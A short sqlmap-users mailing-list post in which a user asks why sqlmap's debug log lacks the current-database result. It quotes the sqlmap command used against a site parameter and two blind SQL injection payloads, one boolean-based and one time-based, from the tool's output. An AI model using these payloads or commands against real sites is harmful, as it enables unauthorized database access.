Hello,
I'm trying to manually reproduce a blind SQL injection that sqlmap (0.9)
found.
Here is how I ran it:
./sqlmap.py -v 6 --level 5 -u "http://site?id=9" --current-db -t debug.log
debug.log does not show any sign of a current-db (that is in output/site/log).
What am I missing?
sqlmap identified the following injection points with a total of 403 HTTP(s)
requests:
---
log shows:
Place: GET
Parameter: fid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=9' AND 8437=8437 AND 'oCOc'='oCOc
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=9' AND SLEEP(5) AND 'BKLq'='BKLq
---
current database: 'dbname'
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users